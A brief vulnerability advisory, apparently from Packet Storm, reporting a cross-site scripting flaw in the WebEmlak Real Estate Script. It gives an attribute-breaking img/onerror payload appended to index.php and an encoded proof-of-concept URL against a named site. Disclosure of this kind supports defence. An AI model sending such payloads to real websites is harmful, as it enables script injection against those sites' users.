WebEmlak Real Estate script suffers from a cross site scripting vulnerability.
5d736afd23d94cf774737b7e49bb25a86e3311e1ed89f5fd37533e5b77c3d1cd# Exploit Title: WebEmlak Real Estate Script Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
ISSUE
Cross Site Scripting can be done using the URL input
Vulnerable Page:
index.php
Example:
index.php/<XSS Code>
Exploit:
index.php/"/></a></><img src=1.gif onerror=alert(1)>
POC:
http://www.webemlakofisi.com/portal2/index.php/%22/%3E%3C/a%3E%3C/%3E%3Cimg%20src=1.gif%20onerror=alert%281%29%3E
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed